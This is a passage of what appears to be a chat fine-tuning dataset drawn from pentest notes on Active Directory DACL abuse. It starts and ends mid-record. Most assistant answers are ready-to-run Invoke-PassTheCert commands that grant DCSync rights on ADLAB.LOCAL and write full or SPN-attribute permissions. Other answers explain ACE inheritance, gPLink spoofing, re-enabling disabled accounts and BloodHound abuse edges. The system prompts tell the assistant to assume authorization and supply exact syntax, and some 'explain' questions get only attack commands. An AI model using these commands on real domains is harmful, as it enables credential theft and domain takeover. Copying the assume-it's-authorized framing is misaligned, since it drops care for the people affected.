-AccessRightGUID '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' -Target 'DC=ADLAB,DC=LOCAL'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Grant DCSync (method 2, using GUIDs instead, same as method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL' during a pentest?", "response": "Invoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightGUID '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' -Target 'DC=ADLAB,DC=LOCAL'\nInvoke-PassTheCert -Action 'CreateInboundACE' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -AceQualifier 'AccessAllowed' -AccessMaskNames 'ExtendedRight' -AccessRightGUID '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' -Target 'DC=ADLAB,DC=LOCAL'", "metadata": {"corpus_index": 425, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Grant DCSync (method 3, same as method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL'?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'DCSync' -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -Target 'DC=ADLAB,DC=LOCAL'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Grant DCSync (method 3, same as method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL'?", "response": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'DCSync' -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -Target 'DC=ADLAB,DC=LOCAL'", "metadata": {"corpus_index": 426, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Grant DCSync (method 3, same as method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL'?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'DCSync' -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -Target 'DC=ADLAB,DC=LOCAL'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Grant DCSync (method 3, same as method 1) to 'Wanha BE. ERUT' against 'ADLAB.LOCAL'?", "response": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'DCSync' -Identity 'CN=Wanha BE. ERUT,CN=Users,DC=X' -Target 'DC=ADLAB,DC=LOCAL'", "metadata": {"corpus_index": 426, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Grant the 'RCSDWDWORPWPCCDCLCSWLODT' SDDL permissions to 'Wanha BE. EDMIN' against the 'COMPUTATOR$' computer work?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'CreateInboundSDDL' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. EDMIN,CN=Users,DC=X' -Target 'CN=COMPUTATOR,CN=Computers,DC=X' -SDDLACEType 'OA' -SDDLACERights 'RCSDWDWORPWPCCDCLCSWLODT'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Grant the 'RCSDWDWORPWPCCDCLCSWLODT' SDDL permissions to 'Wanha BE. EDMIN' against the 'COMPUTATOR$' computer work?", "response": "Invoke-PassTheCert -Action 'CreateInboundSDDL' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. EDMIN,CN=Users,DC=X' -Target 'CN=COMPUTATOR,CN=Computers,DC=X' -SDDLACEType 'OA' -SDDLACERights 'RCSDWDWORPWPCCDCLCSWLODT'", "metadata": {"corpus_index": 427, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Grant the 'RCSDWDWORPWPCCDCLCSWLODT' SDDL permissions to 'Wanha BE. EDMIN' against the 'COMPUTATOR$' computer?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'CreateInboundSDDL' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. EDMIN,CN=Users,DC=X' -Target 'CN=COMPUTATOR,CN=Computers,DC=X' -SDDLACEType 'OA' -SDDLACERights 'RCSDWDWORPWPCCDCLCSWLODT'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Grant the 'RCSDWDWORPWPCCDCLCSWLODT' SDDL permissions to 'Wanha BE. EDMIN' against the 'COMPUTATOR$' computer?", "response": "Invoke-PassTheCert -Action 'CreateInboundSDDL' -LdapConnection $LdapConnection -Identity 'CN=Wanha BE. EDMIN,CN=Users,DC=X' -Target 'CN=COMPUTATOR,CN=Computers,DC=X' -SDDLACEType 'OA' -SDDLACERights 'RCSDWDWORPWPCCDCLCSWLODT'", "metadata": {"corpus_index": 427, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Grant the 'RPWP' (Read Property, Write Property) SDDL permissions to 'J0hn JR. RIPP3R' against the 'SVC SU. USER':'serviceprincipalname' user's attribute"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'CreateInboundSDDL' -LdapConnection $LdapConnection -Identity 'CN=J0hn JR. RIPP3R,CN=Users,DC=X' -Target 'CN=SVC SU. USER,CN=Users,DC=X' -Attribute 'serviceprincipalname' -SDDLACEType 'OA' -SDDLACERights 'RPWP'\n``\n\n> [!TIP]\n> A few tests showed the Add-DomainObjectAcl command needed to be run with the -Credential and -Domain` options in order to work\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Grant the 'RPWP' (Read Property, Write Property) SDDL permissions to 'J0hn JR. RIPP3R' against the 'SVC SU. USER':'serviceprincipalname' user's attribute", "response": "Invoke-PassTheCert -Action 'CreateInboundSDDL' -LdapConnection $LdapConnection -Identity 'CN=J0hn JR. RIPP3R,CN=Users,DC=X' -Target 'CN=SVC SU. USER,CN=Users,DC=X' -Attribute 'serviceprincipalname' -SDDLACEType 'OA' -SDDLACERights 'RPWP'\n``\n\n> [!TIP]\n> A few tests showed the Add-DomainObjectAcl command needed to be run with the -Credential and -Domain` options in order to work\n\n:::", "metadata": {"corpus_index": 428, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Grant the 'RPWP' (Read Property, Write Property) SDDL permissions to 'J0hn JR. RIPP3R' against the 'SVC SU. USER':'serviceprincipalname' user's attribute"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'CreateInboundSDDL' -LdapConnection $LdapConnection -Identity 'CN=J0hn JR. RIPP3R,CN=Users,DC=X' -Target 'CN=SVC SU. USER,CN=Users,DC=X' -Attribute 'serviceprincipalname' -SDDLACEType 'OA' -SDDLACERights 'RPWP'\n``\n\n> [!TIP]\n> A few tests showed the Add-DomainObjectAcl command needed to be run with the -Credential and -Domain` options in order to work\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Grant the 'RPWP' (Read Property, Write Property) SDDL permissions to 'J0hn JR. RIPP3R' against the 'SVC SU. USER':'serviceprincipalname' user's attribute", "response": "Invoke-PassTheCert -Action 'CreateInboundSDDL' -LdapConnection $LdapConnection -Identity 'CN=J0hn JR. RIPP3R,CN=Users,DC=X' -Target 'CN=SVC SU. USER,CN=Users,DC=X' -Attribute 'serviceprincipalname' -SDDLACEType 'OA' -SDDLACERights 'RPWP'\n``\n\n> [!TIP]\n> A few tests showed the Add-DomainObjectAcl command needed to be run with the -Credential and -Domain` options in order to work\n\n:::", "metadata": {"corpus_index": 428, "category": "credentials", "source_file": "docs/src/ad/movement/dacl/grant-rights.md", "page_title": "Grant rights", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about DACL abuse - Theory?"}, {"role": "assistant", "content": "Access privileges for resources in Active Directory Domain Services are usually granted through the use of an Access Control Entry (ACE). Access Control Entries describe the allowed and denied permissions for a principal (e.g. user, computer account) in Active Directory against a securable object (user, group, computer, container, organizational unit (OU), GPO and so on)\n\nDACLs (Active Directory Discretionary Access Control Lists) are lists made of ACEs (Access Control Entries) that identify the users and groups that are allowed or denied access on an object. SACLs (Systems Access Control Lists) define the audit and monitoring rules over a securable object.\n\nWhen misconfigured, ACEs can be abused to operate lateral movement or privilege escalation within an AD domain."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about DACL abuse - Theory?", "response": "Access privileges for resources in Active Directory Domain Services are usually granted through the use of an Access Control Entry (ACE). Access Control Entries describe the allowed and denied permissions for a principal (e.g. user, computer account) in Active Directory against a securable object (user, group, computer, container, organizational unit (OU), GPO and so on)\n\nDACLs (Active Directory Discretionary Access Control Lists) are lists made of ACEs (Access Control Entries) that identify the users and groups that are allowed or denied access on an object. SACLs (Systems Access Control Lists) define the audit and monitoring rules over a securable object.\n\nWhen misconfigured, ACEs can be abused to operate lateral movement or privilege escalation within an AD domain.", "metadata": {"corpus_index": 429, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute DACL abuse - Theory?"}, {"role": "assistant", "content": "Access privileges for resources in Active Directory Domain Services are usually granted through the use of an Access Control Entry (ACE). Access Control Entries describe the allowed and denied permissions for a principal (e.g. user, computer account) in Active Directory against a securable object (user, group, computer, container, organizational unit (OU), GPO and so on)\n\nDACLs (Active Directory Discretionary Access Control Lists) are lists made of ACEs (Access Control Entries) that identify the users and groups that are allowed or denied access on an object. SACLs (Systems Access Control Lists) define the audit and monitoring rules over a securable object.\n\nWhen misconfigured, ACEs can be abused to operate lateral movement or privilege escalation within an AD domain."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute DACL abuse - Theory?", "response": "Access privileges for resources in Active Directory Domain Services are usually granted through the use of an Access Control Entry (ACE). Access Control Entries describe the allowed and denied permissions for a principal (e.g. user, computer account) in Active Directory against a securable object (user, group, computer, container, organizational unit (OU), GPO and so on)\n\nDACLs (Active Directory Discretionary Access Control Lists) are lists made of ACEs (Access Control Entries) that identify the users and groups that are allowed or denied access on an object. SACLs (Systems Access Control Lists) define the audit and monitoring rules over a securable object.\n\nWhen misconfigured, ACEs can be abused to operate lateral movement or privilege escalation within an AD domain.", "metadata": {"corpus_index": 429, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe DACL abuse - Practice in the context of penetration testing"}, {"role": "assistant", "content": "If an object's _(referred to as \"objectA\")_ DACL features an ACE stating that another object _(referred to as \"objectB\")_ has a specific right (e.g. GenericAll) over it (i.e. over objectA), attackers need to be in control of objectB to take control of objectA. The following abuses can only be carried out when running commands as the user mentioned in the ACE (objectB) (see impersonation techniques)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe DACL abuse - Practice in the context of penetration testing", "response": "If an object's _(referred to as \"objectA\")_ DACL features an ACE stating that another object _(referred to as \"objectB\")_ has a specific right (e.g. GenericAll) over it (i.e. over objectA), attackers need to be in control of objectB to take control of objectA. The following abuses can only be carried out when running commands as the user mentioned in the ACE (objectB) (see impersonation techniques).", "metadata": {"corpus_index": 430, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for DACL abuse - Practice?"}, {"role": "assistant", "content": "If an object's _(referred to as \"objectA\")_ DACL features an ACE stating that another object _(referred to as \"objectB\")_ has a specific right (e.g. GenericAll) over it (i.e. over objectA), attackers need to be in control of objectB to take control of objectA. The following abuses can only be carried out when running commands as the user mentioned in the ACE (objectB) (see impersonation techniques)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for DACL abuse - Practice?", "response": "If an object's _(referred to as \"objectA\")_ DACL features an ACE stating that another object _(referred to as \"objectB\")_ has a specific right (e.g. GenericAll) over it (i.e. over objectA), attackers need to be in control of objectB to take control of objectA. The following abuses can only be carried out when running commands as the user mentioned in the ACE (objectB) (see impersonation techniques).", "metadata": {"corpus_index": 430, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does DACL abuse - Recon work?"}, {"role": "assistant", "content": "DACL abuse potential paths can be identified by BloodHound from UNIX-like (using the Python ingestor bloodhound.py) and Windows (using the SharpHound ingestor) systems.\n\nOther tools like, Get-DomainObjectAcl and Add-DomainObjectAcl from Powersploit's Powerview, Get-Acl and Set-Acl official Powershell cmdlets, or Impacket's dacledit.py script (Python) can be used in order to manually inspect an object's DACL."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does DACL abuse - Recon work?", "response": "DACL abuse potential paths can be identified by BloodHound from UNIX-like (using the Python ingestor bloodhound.py) and Windows (using the SharpHound ingestor) systems.\n\nOther tools like, Get-DomainObjectAcl and Add-DomainObjectAcl from Powersploit's Powerview, Get-Acl and Set-Acl official Powershell cmdlets, or Impacket's dacledit.py script (Python) can be used in order to manually inspect an object's DACL.", "metadata": {"corpus_index": 431, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for DACL abuse - Recon?"}, {"role": "assistant", "content": "DACL abuse potential paths can be identified by BloodHound from UNIX-like (using the Python ingestor bloodhound.py) and Windows (using the SharpHound ingestor) systems.\n\nOther tools like, Get-DomainObjectAcl and Add-DomainObjectAcl from Powersploit's Powerview, Get-Acl and Set-Acl official Powershell cmdlets, or Impacket's dacledit.py script (Python) can be used in order to manually inspect an object's DACL."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for DACL abuse - Recon?", "response": "DACL abuse potential paths can be identified by BloodHound from UNIX-like (using the Python ingestor bloodhound.py) and Windows (using the SharpHound ingestor) systems.\n\nOther tools like, Get-DomainObjectAcl and Add-DomainObjectAcl from Powersploit's Powerview, Get-Acl and Set-Acl official Powershell cmdlets, or Impacket's dacledit.py script (Python) can be used in order to manually inspect an object's DACL.", "metadata": {"corpus_index": 431, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is DACL abuse - Abuse?"}, {"role": "assistant", "content": "In order to navigate the notes, testers can use the mindmap below.\n\n![]()\n\nAll the aforementioned attacks (red blocks) are detailed in the child notes, except:\n\n* SPN-jacking: very specific scenario, requires lots of access: see ADDS > Movement > Kerberos > SPN-jacking\n* Shadow Credentials: see ADDS > Movement > Kerberos > Shadow Credentials\n* Kerberos RBCD: see ADDS > Movement > Kerberos > Kerberos Delegations > RBCD\n* GPO abuses: see ADDS > Movement > GPOs\n* DCSync : see ADDS > Movement > Credential > Dumping > DCSync\n\n> [!TIP] Self-attacks\n> \n> * User and computers objects can conduct a Kerberos RCD attack on themselves.\n> * Computer objects can conduct a Shadow Credentials attack on themselves.\n\n> [!TIP] ACE inheritance\n> \n> If attacker can write an ACE (WriteDacl) for a container or organisational unit (OU), if inheritance flags are added (0x01+ 0x02) to the ACE, and inheritance is enabled for an object in that container/OU, the ACE will be applied to it. By default, all the objects with AdminCount=0 will inherit ACEs from their parent container/OU.\n> \n> Impacket's dacledit (Python) can be used with the -inheritance flag for that purpose (PR#1291).\n\n> [!TIP] adminCount=1 (gPLink spoofing)\n> \n> In April 2024, Synacktiv explained that if GenericAll, GenericWrite or Manage Group Policy Links privileges are available against an Organisational Unit (OU), then it's possible to compromise its child users and computers with adminCount=1 through \"gPLink spoofing\".\n> \n> This can be performed with OUned.py.\n\n> [!TIP] Disabled accounts\n> With enough permissions (GenericAll, GenericWrite) over a disabled object, it is possible to enable it again (e.g. set-aduser \"user\" -enabled 1)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is DACL abuse - Abuse?", "response": "In order to navigate the notes, testers can use the mindmap below.\n\n![]()\n\nAll the aforementioned attacks (red blocks) are detailed in the child notes, except:\n\n* SPN-jacking: very specific scenario, requires lots of access: see ADDS > Movement > Kerberos > SPN-jacking\n* Shadow Credentials: see ADDS > Movement > Kerberos > Shadow Credentials\n* Kerberos RBCD: see ADDS > Movement > Kerberos > Kerberos Delegations > RBCD\n* GPO abuses: see ADDS > Movement > GPOs\n* DCSync : see ADDS > Movement > Credential > Dumping > DCSync\n\n> [!TIP] Self-attacks\n> \n> * User and computers objects can conduct a Kerberos RCD attack on themselves.\n> * Computer objects can conduct a Shadow Credentials attack on themselves.\n\n> [!TIP] ACE inheritance\n> \n> If attacker can write an ACE (WriteDacl) for a container or organisational unit (OU), if inheritance flags are added (0x01+ 0x02) to the ACE, and inheritance is enabled for an object in that container/OU, the ACE will be applied to it. By default, all the objects with AdminCount=0 will inherit ACEs from their parent container/OU.\n> \n> Impacket's dacledit (Python) can be used with the -inheritance flag for that purpose (PR#1291).\n\n> [!TIP] adminCount=1 (gPLink spoofing)\n> \n> In April 2024, Synacktiv explained that if GenericAll, GenericWrite or Manage Group Policy Links privileges are available against an Organisational Unit (OU), then it's possible to compromise its child users and computers with adminCount=1 through \"gPLink spoofing\".\n> \n> This can be performed with OUned.py.\n\n> [!TIP] Disabled accounts\n> With enough permissions (GenericAll, GenericWrite) over a disabled object, it is possible to enable it again (e.g. set-aduser \"user\" -enabled 1)", "metadata": {"corpus_index": 432, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform DACL abuse - Abuse?"}, {"role": "assistant", "content": "In order to navigate the notes, testers can use the mindmap below.\n\n![]()\n\nAll the aforementioned attacks (red blocks) are detailed in the child notes, except:\n\n* SPN-jacking: very specific scenario, requires lots of access: see ADDS > Movement > Kerberos > SPN-jacking\n* Shadow Credentials: see ADDS > Movement > Kerberos > Shadow Credentials\n* Kerberos RBCD: see ADDS > Movement > Kerberos > Kerberos Delegations > RBCD\n* GPO abuses: see ADDS > Movement > GPOs\n* DCSync : see ADDS > Movement > Credential > Dumping > DCSync\n\n> [!TIP] Self-attacks\n> \n> * User and computers objects can conduct a Kerberos RCD attack on themselves.\n> * Computer objects can conduct a Shadow Credentials attack on themselves.\n\n> [!TIP] ACE inheritance\n> \n> If attacker can write an ACE (WriteDacl) for a container or organisational unit (OU), if inheritance flags are added (0x01+ 0x02) to the ACE, and inheritance is enabled for an object in that container/OU, the ACE will be applied to it. By default, all the objects with AdminCount=0 will inherit ACEs from their parent container/OU.\n> \n> Impacket's dacledit (Python) can be used with the -inheritance flag for that purpose (PR#1291).\n\n> [!TIP] adminCount=1 (gPLink spoofing)\n> \n> In April 2024, Synacktiv explained that if GenericAll, GenericWrite or Manage Group Policy Links privileges are available against an Organisational Unit (OU), then it's possible to compromise its child users and computers with adminCount=1 through \"gPLink spoofing\".\n> \n> This can be performed with OUned.py.\n\n> [!TIP] Disabled accounts\n> With enough permissions (GenericAll, GenericWrite) over a disabled object, it is possible to enable it again (e.g. set-aduser \"user\" -enabled 1)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform DACL abuse - Abuse?", "response": "In order to navigate the notes, testers can use the mindmap below.\n\n![]()\n\nAll the aforementioned attacks (red blocks) are detailed in the child notes, except:\n\n* SPN-jacking: very specific scenario, requires lots of access: see ADDS > Movement > Kerberos > SPN-jacking\n* Shadow Credentials: see ADDS > Movement > Kerberos > Shadow Credentials\n* Kerberos RBCD: see ADDS > Movement > Kerberos > Kerberos Delegations > RBCD\n* GPO abuses: see ADDS > Movement > GPOs\n* DCSync : see ADDS > Movement > Credential > Dumping > DCSync\n\n> [!TIP] Self-attacks\n> \n> * User and computers objects can conduct a Kerberos RCD attack on themselves.\n> * Computer objects can conduct a Shadow Credentials attack on themselves.\n\n> [!TIP] ACE inheritance\n> \n> If attacker can write an ACE (WriteDacl) for a container or organisational unit (OU), if inheritance flags are added (0x01+ 0x02) to the ACE, and inheritance is enabled for an object in that container/OU, the ACE will be applied to it. By default, all the objects with AdminCount=0 will inherit ACEs from their parent container/OU.\n> \n> Impacket's dacledit (Python) can be used with the -inheritance flag for that purpose (PR#1291).\n\n> [!TIP] adminCount=1 (gPLink spoofing)\n> \n> In April 2024, Synacktiv explained that if GenericAll, GenericWrite or Manage Group Policy Links privileges are available against an Organisational Unit (OU), then it's possible to compromise its child users and computers with adminCount=1 through \"gPLink spoofing\".\n> \n> This can be performed with OUned.py.\n\n> [!TIP] Disabled accounts\n> With enough permissions (GenericAll, GenericWrite) over a disabled object, it is possible to enable it again (e.g. set-aduser \"user\" -enabled 1)", "metadata": {"corpus_index": 432, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain DACL abuse - BloodHound ACE edges"}, {"role": "assistant", "content": "BloodHound has the ability to map abuse paths, with some that rely on DACL abuse. The following edges are not includes in the mindmap above:\n\n* AddKeyCredentialLink, a write permission on an object's Key-Credential-Link attribute, for Shadow Credentials attacks\n* WriteSPN, a write permission on an object's Service-Principal-Name attribute, for targeted Kerberoasting and SPN jacking attacks\n* AddSelf, similar to AddMember. While AddMember is WriteProperty access right on the target's Member attribute, AddSelf is a Self access right on the target's Member attribute, allowing the attacker to add itself to the target group, instead of adding arbitrary principals.\n* AddAllowedToAct, a write permission on an object's msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute, for Kerberos RBCD attacks\n* SyncLAPSPassword, both DS-GetChanges and DS-GetChangesInFilteredSet, for synchronizing LAPS password domain-wise\n* WriteAccountRestrictions, which refers to the User-Account-Restrictions property set, which contains enough permissions to modify the msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute of the target objects, for Kerberos RBCD attacks"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain DACL abuse - BloodHound ACE edges", "response": "BloodHound has the ability to map abuse paths, with some that rely on DACL abuse. The following edges are not includes in the mindmap above:\n\n* AddKeyCredentialLink, a write permission on an object's Key-Credential-Link attribute, for Shadow Credentials attacks\n* WriteSPN, a write permission on an object's Service-Principal-Name attribute, for targeted Kerberoasting and SPN jacking attacks\n* AddSelf, similar to AddMember. While AddMember is WriteProperty access right on the target's Member attribute, AddSelf is a Self access right on the target's Member attribute, allowing the attacker to add itself to the target group, instead of adding arbitrary principals.\n* AddAllowedToAct, a write permission on an object's msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute, for Kerberos RBCD attacks\n* SyncLAPSPassword, both DS-GetChanges and DS-GetChangesInFilteredSet, for synchronizing LAPS password domain-wise\n* WriteAccountRestrictions, which refers to the User-Account-Restrictions property set, which contains enough permissions to modify the msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute of the target objects, for Kerberos RBCD attacks", "metadata": {"corpus_index": 433, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do DACL abuse - BloodHound ACE edges"}, {"role": "assistant", "content": "BloodHound has the ability to map abuse paths, with some that rely on DACL abuse. The following edges are not includes in the mindmap above:\n\n* AddKeyCredentialLink, a write permission on an object's Key-Credential-Link attribute, for Shadow Credentials attacks\n* WriteSPN, a write permission on an object's Service-Principal-Name attribute, for targeted Kerberoasting and SPN jacking attacks\n* AddSelf, similar to AddMember. While AddMember is WriteProperty access right on the target's Member attribute, AddSelf is a Self access right on the target's Member attribute, allowing the attacker to add itself to the target group, instead of adding arbitrary principals.\n* AddAllowedToAct, a write permission on an object's msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute, for Kerberos RBCD attacks\n* SyncLAPSPassword, both DS-GetChanges and DS-GetChangesInFilteredSet, for synchronizing LAPS password domain-wise\n* WriteAccountRestrictions, which refers to the User-Account-Restrictions property set, which contains enough permissions to modify the msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute of the target objects, for Kerberos RBCD attacks"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about 